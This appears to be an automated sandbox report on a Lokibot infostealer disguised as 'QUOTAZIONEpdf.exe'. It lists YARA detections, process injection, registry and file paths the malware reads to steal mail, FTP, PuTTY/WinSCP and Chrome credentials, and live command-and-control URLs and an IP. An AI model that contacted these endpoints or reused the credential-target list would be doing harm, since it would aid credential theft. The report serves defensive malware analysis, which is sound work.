          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_00403225
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0040604C1_2_0040604C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_004047721_2_00404772
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040549C2_2_0040549C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_004029D42_2_004029D4
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: String function: 0041219C appears 45 times
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: String function: 00405B6F appears 42 times
          Source: QUOTAZIONEpdf.exe, 00000001.00000003.292277213.0000000003196000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTAZIONEpdf.exe
          Source: QUOTAZIONEpdf.exe, 00000001.00000003.292572602.000000000332F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTAZIONEpdf.exe
          Source: QUOTAZIONEpdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Users\user\Desktop\QUOTAZIONEpdf.exeJump to behavior
          Source: QUOTAZIONEpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" Jump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3B69.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@56/2
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,1_2_00402012
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404275
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
          Source: Binary string: wntdll.pdbUGP source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp

          Data Obfuscation:

          Yara detected aPLib compressed binary
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_72FB1000 push eax; ret 1_2_72FB102E
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405DA3
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (27).png
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe TID: 4772Thread sleep time: -840000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,1_2_00405D7C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004053AA
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeAPI call chain: ExitProcess graph end nodegraph_1-3623
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeAPI call chain: ExitProcess graph end nodegraph_1-3627
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405DA3
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019E79A mov eax, dword ptr fs:[00000030h]1_2_0019E79A
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EADC mov eax, dword ptr fs:[00000030h]1_2_0019EADC
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EA5F mov eax, dword ptr fs:[00000030h]1_2_0019EA5F
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EA9E mov eax, dword ptr fs:[00000030h]1_2_0019EA9E
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019E9AE mov eax, dword ptr fs:[00000030h]1_2_0019E9AE
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B

          HIPS / PFW / Operating System Protection Evasion:

          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeMemory written: C:\Users\user\Desktop\QUOTAZIONEpdf.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" Jump to behavior
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,1_2_00405AA7
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00406069 GetUserNameW,2_2_00406069

          Stealing of Sensitive Information:

          Yara detected Lokibot
          Source: Yara matchFile source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Code function: PopPassword, 2_2_0040D069
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Code function: SmtpPassword, 2_2_0040D069
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality:

          Yara detected Lokibot

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 2 | Credentials in Registry 2 | File and Directory Discovery 2 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 1 | Security Account Manager | System Information Discovery 5 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 11 | NTDS | Security Software Discovery 1 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 11 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          QUOTAZIONEpdf.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.0.QUOTAZIONEpdf.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.2.QUOTAZIONEpdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.0.QUOTAZIONEpdf.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.0.QUOTAZIONEpdf.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.1.QUOTAZIONEpdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.0.QUOTAZIONEpdf.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.0.QUOTAZIONEpdf.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.0.QUOTAZIONEpdf.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          2.0.QUOTAZIONEpdf.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2

          Domains

          Source | Detection | Scanner | Label
          slimpackage.com | 5% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
          http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
          http://slimpackage.com/slimmain/five/fre.php | 9% | Virustotal |
          http://slimpackage.com/slimmain/five/fre.php | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          slimpackage.com | 104.223.93.105 | true | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
          http://slimpackage.com/slimmain/five/fre.php | true | 9%, Virustotal; Avira URL Cloud: malware | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nsis.sf.net/NSIS_Error | QUOTAZIONEpdf.exe | false | | high
          http://nsis.sf.net/NSIS_ErrorError | QUOTAZIONEpdf.exe | false | | high
          http://www.ibsensoftware.com/ | QUOTAZIONEpdf.exe, QUOTAZIONEpdf.exe, 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, QUOTAZIONEpdf.exe, 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

              Contacted IPs


              Public

              IP | Domain | Country | ASN | ASN Name | Malicious
              104.223.93.105 | slimpackage.com | United States | 8100 | ASN-QUADRANET-GLOBALUS | true

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:553085
              Start date:14.01.2022
              Start time:09:51:34
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 41s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:QUOTAZIONEpdf.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/6@56/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 73.1% (good quality ratio 70.4%)
              • Quality average: 79.1%
              • Quality standard deviation: 27.8%
              HCA Information:
              • Successful, ratio: 88%
              • Number of executed functions: 63
              • Number of non-executed functions: 38
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              Time | Type | Description
              09:52:41 | API Interceptor | 53x Sleep call for process: QUOTAZIONEpdf.exe modified

              Joe Sandbox View / Context

              IPs

              Match | Associated Sample Name / URL | Detection | Context
              104.223.93.105 | __.exe | malicious | slimpackage.com/slimmain/five/fre.php
              104.223.93.105 | Purchase Order #5000012803.exe | malicious | slimpackage.com/slimfit/five/fre.php
              104.223.93.105 | Trasferimento.vbs | malicious | nofearsw.in/cgi-sys/suspendedpage.cgi
              104.223.93.105 | EL1aBD5Zqr.exe | malicious | nofearsw.in/swo/inc/11828554f46a7d.php
              104.223.93.105 | TnUFqujldH.exe | malicious | nofearsw.in/swo/inc/11828554f46a7d.php
              104.223.93.105 | 20210711494754.vbs | malicious | nofearsw.in/fen/inc/9fa099d0b6dea5.php
              104.223.93.105 | msg001.vbs | malicious | nofearsw.in/swo/inc/11828554f46a7d.php
